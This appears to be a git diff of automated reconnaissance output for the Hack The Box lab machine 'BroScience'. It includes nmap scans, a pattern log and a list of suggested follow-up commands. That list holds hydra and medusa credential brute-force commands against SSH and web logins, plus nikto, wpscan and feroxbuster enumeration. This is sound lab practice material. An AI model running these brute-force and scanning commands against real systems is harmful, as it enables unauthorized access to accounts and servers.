| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDB5dEat1MGh3CDDnkl4tdWQcTpdWZYHZj5/Orv3PDjSiQ4dg1i35kknwiZrXLiMsUu/4TigP9Kc3h4M1CS7E3/GprpWxuGmipEucoQuNEtaM0sUa8xobtFxOVF46kS0++ozTd4+zbSLsu73SlLcSuSFalhGnHteHj6/ksSeX642103SMqkkmEu/cbgofkoqQOCYk3Qa42bZq5bjS/auGAlPoAxTjjVtpHnXOKOU7M6gkewD91FB3GAMUdwqR/PJcA5xqGFZm2St9ecSbewCur6pLN5YKnNhvdID4ijWI22gu5pLxHL9XjORMbSUkJbB79VoYJZaNkdOgt+HXR67s9DWI47D6/+pO0dTfQgMFgOCxYheWMDQ2FuyHyGX1CZpMVLAo3sjOvxAqk7eUGutsyBAlYCD4lhSFs6RhSBynahHQah7+Lv5LKRriZe/fQIgrJrQj+tR4Uhz89eWGrXK9bjN22wy7tVkMG/w5dOwo7S3Wi0aTZfd/17D0z7wSdiAiE=
| 256 3f8a56f8958faeafe3ae7eb880f679d2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCgM9UKdxFmXRJESXdlb+BSl+K1F0YCkOjSa8l+tgD6Y3mslSfrawZkdfq8NKLZlmOe8uf1ykgXjLWVDQ9NrJBk=
| 256 3c6575274ae2ef9391374cfdd9d46341 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOMwR+IfRojCwiMuM3tZvdD5JCD2MRVum9frUha60bkN
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.54
|_http-title: Did not follow redirect to https://broscience.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.54 (Debian)
443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.54 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=broscience.htb/organizationName=BroScience/countryName=AT/emailAddress=administrator@broscience.htb/localityName=Vienna
| Issuer: commonName=broscience.htb/organizationName=BroScience/countryName=AT/emailAddress=administrator@broscience.htb/localityName=Vienna
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-07-14T19:48:36
| Not valid after: 2023-07-14T19:48:36
| MD5: 5328ddd62f3429d11d26ae8a68d86e0c
| SHA-1: 20568d0d9e4109cde5a22021fe3f349c40d8d75b
| -----BEGIN CERTIFICATE-----
| MIIF0zCCA7ugAwIBAgIUD+qpK08oB9Kng1mp3mIxnO21+s4wDQYJKoZIhvcNAQEL
| BQAweTELMAkGA1UEBhMCQVQxDzANBgNVBAcMBlZpZW5uYTETMBEGA1UECgwKQnJv
| U2NpZW5jZTEXMBUGA1UEAwwOYnJvc2NpZW5jZS5odGIxKzApBgkqhkiG9w0BCQEW
| HGFkbWluaXN0cmF0b3JAYnJvc2NpZW5jZS5odGIwHhcNMjIwNzE0MTk0ODM2WhcN
| MjMwNzE0MTk0ODM2WjB5MQswCQYDVQQGEwJBVDEPMA0GA1UEBwwGVmllbm5hMRMw
| EQYDVQQKDApCcm9TY2llbmNlMRcwFQYDVQQDDA5icm9zY2llbmNlLmh0YjErMCkG
| CSqGSIb3DQEJARYcYWRtaW5pc3RyYXRvckBicm9zY2llbmNlLmh0YjCCAiIwDQYJ
| KoZIhvcNAQEBBQADggIPADCCAgoCggIBAKcyX2E/e8BqyRU6FoKOWoWFJo6nLHhK
| B0wNgmPrcUZ5ycizPc+6ereoFgzZmj5qI0lBW4ZZNn5m5nBcAlVxCC6qzT+vUY1N
| j8VyC0seh90AJYGXHylWOJoEl+a8UOrbirbkuvJNhwG6Eryo2enWgmSkyHHIjH2d
| mS29vmydxAJafTR04IQkbmyfhbuYMEl5aZZQCS+ZuA+5MRCWbpZg8E02O5zAWSa6
| Kc3W1DnjEFJNECY9fwiga842sR7QxQYaJN30bBQAG0DJgay6Af+7cB82czIt8aRa
| gcrkrCeBtWc6t0VXyCOAqeVSghqzYhZuAbGQaQJN/lgcVL2Zky8Jte70EGW9Lsq1
| m6o92goMCfEFKxKieD0niVtOW1v/mkuwMG7R6VRY9D6ySn9jTK0WmmBYX0V145oY
| BU8WUbhAqZAPb/vsayGmVsKaX6ruNUO0t07ZhMjO8GO1mBh507+3YRtYztwueCOL
| 7e3N5jdOWXIauGXQafo9jhuhletktmeFs5ytM5gTf0X7R+Ink2coum5TI/KVK2WQ
| Lb+oSOkgqbrVpIyr3YrpqW1NnyekPweUbC/n4/uSZv1+9QHjGJ3aQtWmf73JFCkG
| BBeirNufb4/imdX8GZpkJs35kcL32gRyfpLHF9gyEIbW9NEnX1kpg8VfCrUJOjR5
| PFedjVtw4G/bAgMBAAGjUzBRMB0GA1UdDgQWBBR8vMUiyG5QWyER5cOhk24raL+A
| WjAfBgNVHSMEGDAWgBR8vMUiyG5QWyER5cOhk24raL+AWjAPBgNVHRMBAf8EBTAD
| AQH/MA0GCSqGSIb3DQEBCwUAA4ICAQCjEIzE+EpLeuGgCY18AREB4t2xSwqiYgqC
| H+gRoSbQ64xpNrbjOLBeyB4b1FotYdquKiaiFs7P1taY7hQiyHGFk4HOJlhyBnRK
| atjKt6ZE24yWgsGikGx0D57SYTeJwhqafYRnNuqNPCvnvhO1zQjMTl03T30PvSeb
| TDfcgd3rzG72w4S/zL59Vr4kr9Js01LpjDgt2Kyd5zW4RZKHA+RdIE+ePJXZaTwj
| +Ko8QzNKwt3qDlOXAV5MiqUfKPHyg6Rzq8i5bKNMpwU1UxYGpE64T0t+IfhiOX/O
| r/dW59nLXoHTGhqwAStFCzCqu+6Jfod2wFb+9Ty5rctVIpHw2XMEKfC8DSewvCc6
| QjMMMCRc2vpkc/YHberK+VYb8eVf4GcKzq6ns341jZ0FAwNEpB6tY6eeGovOLeeO
| P5ONg9XAO8EipKj/tJhmIZ2G6GHKh1Enj7zg1DoGCMttLeaC5lMzaxAWdwUplaBm
| w/+0dzFuuJL+XlxQIrVpGpmJOmBvPq/WvzU6ZFi4UwbHkow5EVvUPvW2GmTVecpx
| Or1X3z3W5aGvj1tH2OcqY5WTcgDNoBtFc3tob8xNd7KB88DQfNbSHuFShKymwAVK
| bcb0jeUT6YRF6NEmoLu80xyrro+Ejt1fLd3WE6q4+BXvhdj62OPtt5ue2rEhycgc
| dfC1SCd82A==
|_-----END CERTIFICATE-----
|_http-server-header: Apache/2.4.54 (Debian)
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
Aggressive OS guesses: Linux 4.15 - 5.6 (94%), Linux 5.3 - 5.4 (94%), Linux 2.6.32 (93%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 5.0 - 5.3 (92%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Linux 5.0 (91%), Crestron XPanel control system (91%), Adtran 424RG FTTH gateway (90%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=2/1%OT=22%CT=1%CU=%PV=Y%DS=2%DC=T%G=N%TM=63DA9861%P=x86_64-pc-linux-gnu)
SEQ(SP=105%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)
OPS(O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11NW7%O6=M54BST11)
WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M54BNNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 28.623 days (since Wed Jan 4 02:53:32 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 5900/tcp)
HOP RTT ADDRESS
1 25.54 ms 10.10.16.1
2 57.25 ms broscience.htb (10.10.11.195)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 1 17:50:41 2023 -- 1 IP address (1 host up) scanned in 62.65 seconds

112
HTB/broscience/results/scans/_manual_commands.txt Normal file
View File

@@ -0,0 +1,112 @@
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/broscience/results/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.10.11.195
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/broscience/results/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.10.11.195
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.10.11.195:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.10.11.195/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.10.11.195 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.10.11.195/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.10.11.195 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.10.11.195:80 2>&1 | tee "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.10.11.195:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_wpscan.txt"
[*] http on tcp/443
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u https://10.10.11.195:443 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 443 -o "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_auth_hydra.txt" https-get://10.10.11.195/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 443 -O "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_auth_medusa.txt" -M http -h 10.10.11.195 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 443 -o "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_form_hydra.txt" https-post-form://10.10.11.195/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 443 -O "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_form_medusa.txt" -M web-form -h 10.10.11.195 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h https://10.10.11.195:443 2>&1 | tee "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url https://10.10.11.195:443/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_wpscan.txt"
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/broscience/results/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.10.11.195
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/broscience/results/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.10.11.195
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.10.11.195:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.10.11.195/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.10.11.195 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.10.11.195/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.10.11.195 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.10.11.195:80 2>&1 | tee "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.10.11.195:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_wpscan.txt"
[*] http on tcp/443
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u https://10.10.11.195:443 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 443 -o "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_auth_hydra.txt" https-get://10.10.11.195/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 443 -O "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_auth_medusa.txt" -M http -h 10.10.11.195 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 443 -o "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_form_hydra.txt" https-post-form://10.10.11.195/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 443 -O "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_form_medusa.txt" -M web-form -h 10.10.11.195 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h https://10.10.11.195:443 2>&1 | tee "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url https://10.10.11.195:443/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_wpscan.txt"

64
HTB/broscience/results/scans/_patterns.log Normal file
View File

@@ -0,0 +1,64 @@
Identified HTTP Server: Apache/2.4.54 (Debian)
Identified HTTP Server: Apache/2.4.54 (Debian)
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized
Identified HTTP Server: Apache/2.4.54 (Debian)
Identified HTTP Server: Apache/2.4.54 (Debian)
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized

107
HTB/broscience/results/scans/_quick_tcp_nmap.txt Normal file
View File

@@ -0,0 +1,107 @@
# Nmap 7.93 scan initiated Wed Feb 1 17:49:39 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/htb/broscience/results/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/broscience/results/scans/xml/_quick_tcp_nmap.xml 10.10.11.195
Nmap scan report for broscience.htb (10.10.11.195)
Host is up, received user-set (0.048s latency).
Scanned at 2023-02-01 17:49:39 CET for 34s
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 df17c6bab18222d91db5ebff5d3d2cb7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDB5dEat1MGh3CDDnkl4tdWQcTpdWZYHZj5/Orv3PDjSiQ4dg1i35kknwiZrXLiMsUu/4TigP9Kc3h4M1CS7E3/GprpWxuGmipEucoQuNEtaM0sUa8xobtFxOVF46kS0++ozTd4+zbSLsu73SlLcSuSFalhGnHteHj6/ksSeX642103SMqkkmEu/cbgofkoqQOCYk3Qa42bZq5bjS/auGAlPoAxTjjVtpHnXOKOU7M6gkewD91FB3GAMUdwqR/PJcA5xqGFZm2St9ecSbewCur6pLN5YKnNhvdID4ijWI22gu5pLxHL9XjORMbSUkJbB79VoYJZaNkdOgt+HXR67s9DWI47D6/+pO0dTfQgMFgOCxYheWMDQ2FuyHyGX1CZpMVLAo3sjOvxAqk7eUGutsyBAlYCD4lhSFs6RhSBynahHQah7+Lv5LKRriZe/fQIgrJrQj+tR4Uhz89eWGrXK9bjN22wy7tVkMG/w5dOwo7S3Wi0aTZfd/17D0z7wSdiAiE=
| 256 3f8a56f8958faeafe3ae7eb880f679d2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCgM9UKdxFmXRJESXdlb+BSl+K1F0YCkOjSa8l+tgD6Y3mslSfrawZkdfq8NKLZlmOe8uf1ykgXjLWVDQ9NrJBk=
| 256 3c6575274ae2ef9391374cfdd9d46341 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOMwR+IfRojCwiMuM3tZvdD5JCD2MRVum9frUha60bkN
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.54
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://broscience.htb/
|_http-server-header: Apache/2.4.54 (Debian)
443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.54 ((Debian))
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.54 (Debian)
| ssl-cert: Subject: commonName=broscience.htb/organizationName=BroScience/countryName=AT/localityName=Vienna/emailAddress=administrator@broscience.htb
| Issuer: commonName=broscience.htb/organizationName=BroScience/countryName=AT/localityName=Vienna/emailAddress=administrator@broscience.htb
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-07-14T19:48:36
| Not valid after: 2023-07-14T19:48:36
| MD5: 5328ddd62f3429d11d26ae8a68d86e0c
| SHA-1: 20568d0d9e4109cde5a22021fe3f349c40d8d75b
| -----BEGIN CERTIFICATE-----
| MIIF0zCCA7ugAwIBAgIUD+qpK08oB9Kng1mp3mIxnO21+s4wDQYJKoZIhvcNAQEL
| BQAweTELMAkGA1UEBhMCQVQxDzANBgNVBAcMBlZpZW5uYTETMBEGA1UECgwKQnJv
| U2NpZW5jZTEXMBUGA1UEAwwOYnJvc2NpZW5jZS5odGIxKzApBgkqhkiG9w0BCQEW
| HGFkbWluaXN0cmF0b3JAYnJvc2NpZW5jZS5odGIwHhcNMjIwNzE0MTk0ODM2WhcN
| MjMwNzE0MTk0ODM2WjB5MQswCQYDVQQGEwJBVDEPMA0GA1UEBwwGVmllbm5hMRMw
| EQYDVQQKDApCcm9TY2llbmNlMRcwFQYDVQQDDA5icm9zY2llbmNlLmh0YjErMCkG
| CSqGSIb3DQEJARYcYWRtaW5pc3RyYXRvckBicm9zY2llbmNlLmh0YjCCAiIwDQYJ
| KoZIhvcNAQEBBQADggIPADCCAgoCggIBAKcyX2E/e8BqyRU6FoKOWoWFJo6nLHhK
| B0wNgmPrcUZ5ycizPc+6ereoFgzZmj5qI0lBW4ZZNn5m5nBcAlVxCC6qzT+vUY1N
| j8VyC0seh90AJYGXHylWOJoEl+a8UOrbirbkuvJNhwG6Eryo2enWgmSkyHHIjH2d
| mS29vmydxAJafTR04IQkbmyfhbuYMEl5aZZQCS+ZuA+5MRCWbpZg8E02O5zAWSa6
| Kc3W1DnjEFJNECY9fwiga842sR7QxQYaJN30bBQAG0DJgay6Af+7cB82czIt8aRa
| gcrkrCeBtWc6t0VXyCOAqeVSghqzYhZuAbGQaQJN/lgcVL2Zky8Jte70EGW9Lsq1
| m6o92goMCfEFKxKieD0niVtOW1v/mkuwMG7R6VRY9D6ySn9jTK0WmmBYX0V145oY
| BU8WUbhAqZAPb/vsayGmVsKaX6ruNUO0t07ZhMjO8GO1mBh507+3YRtYztwueCOL
| 7e3N5jdOWXIauGXQafo9jhuhletktmeFs5ytM5gTf0X7R+Ink2coum5TI/KVK2WQ
| Lb+oSOkgqbrVpIyr3YrpqW1NnyekPweUbC/n4/uSZv1+9QHjGJ3aQtWmf73JFCkG
| BBeirNufb4/imdX8GZpkJs35kcL32gRyfpLHF9gyEIbW9NEnX1kpg8VfCrUJOjR5
| PFedjVtw4G/bAgMBAAGjUzBRMB0GA1UdDgQWBBR8vMUiyG5QWyER5cOhk24raL+A
| WjAfBgNVHSMEGDAWgBR8vMUiyG5QWyER5cOhk24raL+AWjAPBgNVHRMBAf8EBTAD
| AQH/MA0GCSqGSIb3DQEBCwUAA4ICAQCjEIzE+EpLeuGgCY18AREB4t2xSwqiYgqC
| H+gRoSbQ64xpNrbjOLBeyB4b1FotYdquKiaiFs7P1taY7hQiyHGFk4HOJlhyBnRK
| atjKt6ZE24yWgsGikGx0D57SYTeJwhqafYRnNuqNPCvnvhO1zQjMTl03T30PvSeb
| TDfcgd3rzG72w4S/zL59Vr4kr9Js01LpjDgt2Kyd5zW4RZKHA+RdIE+ePJXZaTwj
| +Ko8QzNKwt3qDlOXAV5MiqUfKPHyg6Rzq8i5bKNMpwU1UxYGpE64T0t+IfhiOX/O
| r/dW59nLXoHTGhqwAStFCzCqu+6Jfod2wFb+9Ty5rctVIpHw2XMEKfC8DSewvCc6
| QjMMMCRc2vpkc/YHberK+VYb8eVf4GcKzq6ns341jZ0FAwNEpB6tY6eeGovOLeeO
| P5ONg9XAO8EipKj/tJhmIZ2G6GHKh1Enj7zg1DoGCMttLeaC5lMzaxAWdwUplaBm
| w/+0dzFuuJL+XlxQIrVpGpmJOmBvPq/WvzU6ZFi4UwbHkow5EVvUPvW2GmTVecpx
| Or1X3z3W5aGvj1tH2OcqY5WTcgDNoBtFc3tob8xNd7KB88DQfNbSHuFShKymwAVK
| bcb0jeUT6YRF6NEmoLu80xyrro+Ejt1fLd3WE6q4+BXvhdj62OPtt5ue2rEhycgc
| dfC1SCd82A==
|_-----END CERTIFICATE-----
|_http-title: BroScience : Home
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
Aggressive OS guesses: Linux 4.15 - 5.6 (94%), Linux 5.3 - 5.4 (94%), Linux 2.6.32 (94%), Linux 5.0 - 5.3 (93%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Crestron XPanel control system (91%), Linux 5.4 (91%), Linux 2.6.39 - 3.2 (90%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=2/1%OT=22%CT=1%CU=%PV=Y%DS=2%DC=T%G=N%TM=63DA9845%P=x86_64-pc-linux-gnu)
SEQ(SP=102%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)
OPS(O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11NW7%O6=M54BST11)
WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M54BNNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 28.623 days (since Wed Jan 4 02:53:31 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1720/tcp)
HOP RTT ADDRESS
1 93.25 ms 10.10.16.1
2 93.24 ms broscience.htb (10.10.11.195)
Read data files from: /usr/bin/../share/nmap
